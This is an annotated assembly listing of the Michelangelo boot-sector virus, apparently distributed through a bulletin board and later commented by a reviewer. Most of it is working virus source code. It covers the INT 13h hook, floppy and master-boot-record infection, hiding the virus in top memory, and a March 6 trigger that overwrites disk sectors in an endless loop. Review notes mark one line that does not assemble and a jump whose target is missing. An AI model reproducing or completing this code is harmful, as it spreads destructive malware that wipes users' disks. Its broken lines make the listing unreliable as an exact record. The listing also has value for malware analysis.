
;     Michelangelo
;     Size: 512
;     Type: Boot infector
;     Date of action: March 6th
;
;
 
; Equates used by the boot-sector code. Two address spaces are mixed here:
; the 04xxh/7Cxxh values are absolute offsets in segment 0 (used by loc_6,
; which runs with DS = 0 while the sector sits at 0000:7C00); 7, 8 and 0Ah
; are offsets inside the 512-byte image itself (used once DS = CS).
data_1e		equ	4Ch			; 0000:004C = offset half of the INT 13h vector (13h*4)
data_2e		equ	4Eh			; 0000:004E = segment half of the INT 13h vector
data_3e		equ	413h			; 0000:0413 = BIOS Data Area base-memory size in KiB (0040:0013)
data_4e		equ	7C05h			; image offset 05h: segment half of the far-jump target stored at offset 03h
data_5e		equ	7C0Ah			; image offset 0Ah: saved original INT 13h offset
data_6e		equ	7C0Ch			; image offset 0Ch: saved original INT 13h segment
data_7e		equ	7			; byte: number of heads visited by the overwrite loop (2 in the image, set to 4 for a hard disk)
data_8e		equ	8			; word: CX (cylinder/sector) where the original boot sector was moved to
data_9e		equ	0Ah			; dword: saved original INT 13h vector (same cell as data_5e/data_6e, seen with DS = CS)
data_11e	equ	7C03h			; dword at image offset 03h: far-jump target, offset 00F5h plus the patched segment
  
;-----------------------------------------------------------------------
; Annotated boot-sector image of the Michelangelo virus (for analysis).
; Target:  16-bit real mode; the BIOS loads the 512-byte sector at
;          0000:7C00 and jumps to offset 0.
; org 100h below is a listing artifact: the "(0xxx)" addresses in the
; original comments are org-relative, so offset-in-image = addr - 100h
; and first-execution address = 7C00h + offset.
;
; Image layout (offsets within the 512 bytes, derived from the encoded
; lengths of the instructions and db lines below):
;   0000h  jmp loc_6             BIOS entry
;   0003h  dword 00F5h:????      far-jump target; the segment word at
;                                0005h (data_4e = 7C05h) is patched by loc_6
;   0007h  byte  2               data_7e: heads visited by the overwrite loop
;   0008h  word  3               data_8e: CX (cyl/sector) holding the moved
;                                original boot sector (3 / 0Eh floppy, 7 hard disk)
;   000Ah  dword                 data_9e: saved original INT 13h vector
;   000Eh  resident INT 13h hook (db-encoded; decoded line by line below)
;   0045h  loc_1                 floppy infection, called from the hook
;   00AFh  loc_6                 installer, run once at boot
;   00F5h  db-encoded            reload of the original boot sector
;   013Eh  loc_7                 trigger check: INT 1Ah date == 0306h
;   0150h  loc_9                 disk overwrite loop
;   0187h  loc_12                hard-disk infection
;   01BEh  partition table       66 bytes copied from the host at infection
;   01FEh  55AAh                 boot signature
;
; What a defender can look for on a machine that booted this (all of it
; set up by loc_6): the INT 13h vector at 0000:004C pointing to offset
; 000Eh of a segment just below the top of conventional memory, and the
; base-memory word at 0040:0013 reading 2 KiB less than the machine has.
;-----------------------------------------------------------------------
seg_a		segment
		assume	cs:seg_a, ds:seg_a
  
  
		org	100h			; listing-only; runtime CS:IP is 0000:7C00, later <hidden segment>:0000
  
mich		proc	far			; NOTE(review): no matching "mich endp" appears before seg_a ends
  
start:
		jmp	loc_6 ; (01AF) BIOS entry; everything between here and loc_6 is data plus hidden code
; Offsets 0003h-0044h. Only the first 0Bh bytes are data; from 000Eh on
; they are the resident INT 13h hook, which the disassembler did not
; follow because it is only reached through the vector written at loc_6.
; Hook logic: pass every call straight through unless DL = 0 (drive A:)
; and the drive-A: bit of the floppy motor-status byte at 0000:043F is
; clear; in that case let the original handler service the request first,
; then call the infection routine (register save at 0036h, then loc_1),
; restore the result flags and retf 2 to the INT caller.
		db	0F5h, 0, 80h, 9Fh, 2, 3 ; 0003h: far-jump offset 00F5h; 0005h: segment (patched at boot); 0007h: head count 2; 0008h: low byte of the sector word (3)
		db	0, 56h, 2, 0, 0C8h, 1Eh ; 0009h: high byte of the sector word; 000Ah: saved INT 13h vector (4 bytes, filled by loc_6); 000Eh: push ds
		db	50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; push ax / or dl,dl / jnz 002Fh (DL <> 0: not drive A:, pass through) / xor ax,ax ...
		db	0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; ... / mov ds,ax / test byte ptr [043Fh],1 ...
		db	4, 1, 75h, 10h, 58h, 1Fh ; ... (floppy motor status) / jnz 002Fh (motor already on: pass through) / pop ax / pop ds
		db	9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; pushf / call far cs:[000Ah]: the original INT 13h services the request
		db	9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh ; pushf / call 0036h (save registers, then loc_1) / popf / retf ...
		db	2, 0, 58h, 1Fh, 2Eh, 0FFh ; ... 2 (back to the INT caller, dropping its pushed flags) / 002Fh: pop ax / pop ds / jmp far ...
		db	2Eh, 0Ah, 0, 50h, 53h, 51h ; ... cs:[000Ah] (pass through) / 0036h: push ax / push bx / push cx
		db	52h, 1Eh, 6, 56h, 57h, 0Eh ; push dx / push ds / push es / push si / push di / push cs ...
		db	1Fh, 0Eh, 7, 0BEh, 4, 0 ; ... pop ds / push cs / pop es (DS = ES = CS) / mov si,4 (read attempts); falls into loc_1
loc_1: ; Read the boot sector of drive A: into DS:0200h, up to 4 attempts (SI)
		mov	ax,201h			; AH=02h read, AL=1 sector
		mov	bx,200h			; buffer = DS:0200h, just past this 512-byte image
		mov	cx,1			; cylinder 0, sector 1
		xor	dx,dx			; head 0, drive 00h (A:)
		pushf				; simulate an INT: push flags, then far-call ...
		call	dword ptr ds:data_9e	; ... the saved original INT 13h (DS = CS here)
		jnc	loc_2			; read succeeded
		xor	ax,ax			; AH=00h: reset the drive ...
		pushf
		call	dword ptr ds:data_9e	; ... through the original handler
		dec	si
		jnz	loc_1			; retry
		jmp	short loc_5		; give up: restore registers and return into the hook
loc_2: ; Already infected? Compare the first two words of this image with the sector just read
		xor	si,si			; DS:SI -> offset 0 of this image
		cld
		lodsw				; AX = word at 0000h
		cmp	ax,[bx]
		jne	loc_3			; differs: not infected yet
		lodsw				; AX = word at 0002h
		cmp	ax,[bx+2]
		je	loc_5			; both match: leave the disk alone
loc_3: ; Choose where the original boot sector is moved: cylinder 0, head 1, sector 3 or 14
		mov	ax,301h			; AH=03h write, AL=1 sector
		mov	dh,1			; head 1 (DL = A: and CH = 0 as set in loc_1)
		mov	cl,3			; sector 3 ...
		cmp	byte ptr [bx+15h],0FDh	; BPB media-descriptor byte of the sector read: 0FDh = 360 KiB disk
		je	loc_4
		mov	cl,0Eh			; ... otherwise sector 14
loc_4: ; Write the original boot sector there, then overwrite sector 1 with this image
		mov	ds:data_8e,cx		; remember CX so the boot-time code can reload the original later
		pushf
		call	dword ptr ds:data_9e	; write DS:0200h (the original boot sector) via the original INT 13h
		jc	loc_5			; write failed: leave the disk alone
		mov	si,3BEh			; 0200h + 1BEh: last 66 bytes of the original boot sector
		mov	di,1BEh			; -> same offset in this image (partition-table area)
		mov	cx,21h			; 21h words = 66 bytes
		cld
		rep	movsw
		mov	ax,301h			; AH=03h write, AL=1 sector
		xor	bx,bx			; buffer = DS:0000h, this image
		mov	cx,1			; cylinder 0, sector 1
		xor	dx,dx			; head 0, drive A:
		pushf
		call	dword ptr ds:data_9e	; write this image over the boot sector
loc_5: ; Restore the registers saved at 0036h and return into the hook
		pop	di
		pop	si
		pop	es
		pop	ds
		pop	dx
		pop	cx
		pop	bx
		pop	ax
		retn
loc_6: ; Boot-time installer: runs once from 0000:7C00 with DS = SS = 0
		xor	ax,ax
		mov	ds,ax			; DS = 0: the 04xxh/7Cxxh equates below are absolute in segment 0
		cli
		mov	ss,ax
		mov	ax,7C00h
		mov	sp,ax			; stack grows down from the sector's own load address
		sti
		push	ds			; push 0000:7C00 as a far return address; the retf in loc_7 ...
		push	ax			; ... lands there, where the original boot sector is reloaded
		mov	ax,ds:data_1e		; save the current INT 13h vector: offset from 0000:004C ...
		mov	ds:data_5e,ax		; ... into image offset 0Ah
		mov	ax,ds:data_2e		; segment from 0000:004E ...
		mov	ds:data_6e,ax		; ... into image offset 0Ch
		mov	ax,ds:data_3e		; BIOS base-memory size in KiB (0040:0013)
		dec	ax
		dec	ax			; hide 2 KiB at the top of conventional memory
		mov	ds:data_3e,ax
		mov	cl,6
		shl	ax,cl			; KiB * 64 = paragraphs: segment of the hidden 2 KiB
		mov	es,ax
		mov	ds:data_4e,ax		; patch the segment half of the far-jump target at image offset 03h
		mov	ax,0Eh
		mov	ds:data_1e,ax		; INT 13h := ES:000Eh, the hook hidden in the db bytes above
		mov	ds:data_2e,es
		mov	cx,1BEh
		mov	si,7C00h
		xor	di,di
		cld
		rep	movsb			; copy the first 1BEh bytes of this sector to ES:0000
		jmp	dword ptr cs:data_11e	; far jump to ES:00F5h: continue in the hidden copy
; Offsets 00F5h-013Dh, now executing from the hidden copy (CS = the hidden
; segment). Reloads the original boot sector to 0000:7C00 and, when booted
; from a floppy, also reads the hard-disk MBR to see whether it is infected.
		db	33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ; xor ax,ax / mov es,ax / int 13h (AH=00h: disk reset)
		db	0Eh, 1Fh, 0B8h, 1, 2, 0BBh      ; push cs / pop ds / mov ax,0201h (read 1 sector) / mov bx,...
		db	0, 7Ch, 8Bh, 0Eh, 8, 0          ; ...7C00h (buffer 0000:7C00) / mov cx,[data_8e] (where the original was moved)
		db	83h, 0F9h, 7, 75h, 7, 0BAh      ; cmp cx,7 / jne 0113h (not 7: booted from a floppy) / mov dx,...
		db	80h, 0, 0CDh, 13h, 0EBh, 2Bh    ; ...0080h (hard disk, head 0) / int 13h: reload the original MBR / jmp short loc_7
		db	8Bh, 0Eh, 8, 0, 0BAh, 0         ; 0113h: mov cx,[data_8e] / mov dx,...
		db	1, 0CDh, 13h, 72h, 20h, 0Eh     ; ...0100h (A:, head 1) / int 13h: reload the original floppy sector / jc loc_7 / push cs ...
		db	7, 0B8h, 1, 2, 0BBh, 0          ; ... pop es / mov ax,0201h / mov bx,...
		db	2, 0B9h, 1, 0, 0BAh, 80h        ; ...0200h (buffer CS:0200h) / mov cx,1 / mov dx,...
		db	0, 0CDh, 13h, 72h, 0Eh, 33h     ; ...0080h / int 13h: read the hard-disk MBR / jc loc_7 / xor ...
		db	0F6h, 0FCh, 0ADh, 3Bh, 7, 75h   ; ...si,si / cld / lodsw / cmp ax,[bx] / jne ...
		db	4Fh, 0ADh, 3Bh, 47h, 2          ; ...loc_12 (first word differs: MBR not infected yet) / lodsw / cmp ax,[bx+2]
		db	75h, 49h                        ; jne loc_12; both words match, so fall into the trigger check
loc_7: ; Trigger check: is today March 6th?
		xor	cx,cx
		mov	ah,4
		int	1Ah			; RTC: AH=04h read date, CX=year, DX=month/day in BCD
						; (this function is not available on an XT)
		cmp	dx,306h			; 03/06 of any year
		je	loc_8			; yes: go overwrite the disk
		retf				; no: far return to 0000:7C00 pushed in loc_6, i.e. run the reloaded original boot sector
loc_8: ; Overwrite starts at drive A:, head 0, cylinder 0, sector 1
		xor	dx,dx
		mov	cx,1
loc_9: ; One write per head; sector count and drive depend on where this copy came from (data_8e)
		mov	ax,309h			; AH=03h write, AL=9 sectors (360 KiB floppy case)
		mov	si,ds:data_8e
		cmp	si,3
		je	loc_10
		mov	al,0Eh			; 14 sectors (other floppy case)
		cmp	si,0Eh
		je	loc_10
		mov	dl,80h			; hard disk ...
		mov	byte ptr ds:data_7e,4	; ... 4 heads ...
		mov	al,11h			; ... 17 sectors per track
loc_10: ; ES:BX = 5000h:5000h: whatever memory holds there is what gets written
		mov	bx,5000h
		mov	es,bx
		int	13h			; write AL sectors from ES:BX to the CHS in CX/DH on drive DL
		jnc	loc_11
		xor	ah,ah
		int	13h			; on error: AH=00h reset, then continue regardless
loc_11: ; Next head, then next cylinder; there is no exit: CH simply wraps, so this runs until the machine stops
		inc	dh
		cmp	dh,ds:data_7e
		jb	loc_9
		xor	dh,dh
		inc	ch
		jmp	short loc_9
loc_12: ; Hard-disk infection, reached from the 00F5h code when the MBR read into CS:0200h is not infected
		mov	cx,7
		mov	ds:data_8e,cx		; the original MBR is moved to cylinder 0, head 0, sector 7
		mov	ax,301h			; AH=03h write, AL=1 sector
		mov	dx,80h			; hard disk, head 0 (ES:BX = CS:0200h from the code above)
		int	13h			; write the original MBR to sector 7
		jc	loc_7			; failed: skip infection, go to the trigger check
		mov	si,3BEh			; 0200h + 1BEh: partition table of the original MBR
		mov	di,1BEh			; -> same offset in this image
		mov	cx,21h			; 21h words = 66 bytes
		rep	movsw
						; NOTE(review): the next line's trailing text starts with ':' where ';' was meant, so it does not assemble as written
		mov	ax,301h                 : to es:[di]
		xor	bx,bx			; ES:BX = CS:0000h, this image
		inc	cl			; CL = 1: cylinder 0, sector 1, the MBR
		int	13h			; write this image over the MBR
;*		jmp	short loc_13		;*(02E0)
; NOTE(review): the two bytes below encode "jmp short" to image offset 01E0h
; (01ACh + 2 + 32h), which lies inside the partition-table area 01BEh-01FDh;
; no loc_13 is defined in this listing, so the control flow after hard-disk
; infection cannot be recovered from this page.
		db	0EBh, 32h
		db	1, 4, 11h, 0, 80h, 0		; 01AEh-01BCh: 15 bytes that no code in this listing references
		db	5, 5, 32h, 1, 0, 0
		db	0, 0, 0
		db	53h, 53h, 20h, 20h, 43h, 4Fh	; 01BDh: "SS  COM"; from 01BEh on this is the partition-table area ...
		db	4Dh
		db	58 dup (0)			; ... which is overwritten with the 66 bytes copied from the host at infection
		db	55h, 0AAh			; 01FEh: boot signature
  
seg_a		ends

;Last notes this virus looks like a poor hack job on the stoned virus.
;It is kinda cool in the fact that it is hard to get out of the partition table:
;even if you nuke the partition table it will live on, even if you replace it.
;the only way to get it out of the partition table is 1. debug, 2. clean ver 86b,
;3. cpav 1.0 and above. oh yeah and all that special shit that came out for it
;this virus uses int 1ah which doesn't work on an XT system.
;the virus isn't actually 512 but that is how much it writes.
;it moves the boot area of a floppy to the last sector on the disk
;and on a harddrive it moves it to the last sector in the root directory
;This should show you all how much the media can overdo it on things,
;since this is really a lame virus; to tell you the truth there are a lot of better
;ones out there.
;This in no way is a complete listing of the code for the virus.
;Nor is it the best since i'm not the best at Assembly.
;Done by Visionary.
;BTW to who ever wrote this virus... Get a life!  

-------------------------------------------------------------------------------
Downloaded From P-80 Systems 304-744-2253